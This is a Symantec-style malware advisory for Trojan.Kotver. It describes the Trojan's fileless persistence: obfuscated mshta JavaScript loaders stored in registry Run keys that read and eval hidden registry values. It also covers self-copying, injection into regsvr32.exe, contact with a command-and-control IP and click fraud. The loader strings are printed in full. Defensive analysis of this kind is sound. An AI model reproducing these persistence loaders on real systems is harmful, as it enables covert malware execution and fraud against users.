Home / malware Trojan.Kotver
First posted on 04 September 2015.
Source: SymantecAliases :
There are no other names known for Trojan.Kotver.
Explanation :
Once executed, the Trojan checks if Windows PowerShell is installed on the compromised computer.
If Windows PowerShell is installed, the Trojan creates the following registry entries:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"[NULL + RANDOM STRING]" = "mshta javascript:wwlOHC65KM="uXj2QEAC";NM5=new%20ActiveXObject("WScript.Shell");RszKM5eTb="U";F4YWS=NM5.RegRead("HKCU\\software\\[RANDOM ALPHANUMERIC STRING]\\[RANDOM ALPHANUMERIC STRING]");lDvoGb3z="o";eval(F4YWS);HrZ3hVK="Psl35";"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\"[NULL + RANDOM STRING]" = "mshta javascript:KEbIgF4p="dnwnhF";B4P=new%20ActiveXObject("WScript.Shell");ZdBYB2Py="q68xEps";cYpW8=B4P.RegRead("HKLM\\software\\[RANDOM ALPHANUMERIC STRING]\\[RANDOM ALPHANUMERIC STRING]");rsWpcm30K="TPpkXXrp";eval(cYpW8);oebADA6Vl="e";"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"[NULL + RANDOM STRING]" = "mshta javascript:mjLCq16YM="JIl7";Q1C3=new%20ActiveXObject("WScript.Shell");sVpI8GP4gh="fJmAajd";X7DHa=Q1C3.RegRead("HKLM\\software\\[RANDOM ALPHANUMERIC STRING]\\[RANDOM ALPHANUMERIC STRING]");iItYI32g="4UOKOVkou8";eval(X7DHa);DeLKKD2I="roo";"HKEY_LOCAL_MACHINE\SOFTWARE\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"HKEY_LOCAL_MACHINE\SOFTWARE\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "[ENCRYPTED EXECUTABLE BINARY DATA]"HKEY_LOCAL_MACHINE\SOFTWARE\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "[SECOND LOADER SCRIPT]"HKEY_CURRENT_USER\Software\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"HKEY_CURRENT_USER\Software\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "[ENCRYPTED EXECUTABLE BINARY DATA]"HKEY_CURRENT_USER\Software\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "[SECOND LOADER SCRIPT]"
If the compromised computer does not have Windows PowerShell installed, the Trojan will create a copy of itself in the following location:
%UserProfile%\Application Data\[RANDOM FOLDER NAME]\[RANDOM FILE NAME].exe
The Trojan will then create the following registry entries:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"[DEFAULT]" = "%UserProfile%\Application Data\[RANDOM FOLDER NAME]\[RANDOM FILE NAME].exe"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"[DEFAULT]" = "%UserProfile%\Application Data\[RANDOM FOLDER NAME]\[RANDOM FILE NAME].exe"HKEY_LOCAL_MACHINE\SOFTWARE\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"HKEY_CURRENT_USER\SOFTWARE\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"HKEY_LOCAL_MACHINE\SOFTWARE\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "%UserProfile%\Application Data\[RANDOM FOLDER NAME]\[RANDOM FILE NAME].exe"HKEY_CURRENT_USER\Software\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "%UserProfile%\Application Data\[RANDOM FOLDER NAME]\[RANDOM FILE NAME].exe"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\"iexplore.exe" = "22B8"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\"iexplore.exe" = "22B8"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\"regsvr32.exe" = "22B8"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\\"regsvr32.exe" = "22B8"
The Trojan injects itself into the following Windows process:
regsvr32.exe Next, the Trojan connects to the following remote location:
[http://]155.94.67.5/uploa[REMOVED]
The Trojan may download additional software onto the compromised computer, such as the following:
Microsoft .NET RuntimeMicrosoft Internet ExplorerAdobe Flash Player
The Trojan then performs click-fraud operations which involves covertly downloading large numbers of online advertisements onto the compromised computer and then automatically clicking or interacting with them with a view to earning fraudulent advertising revenue for the attacker.Last update 04 September 2015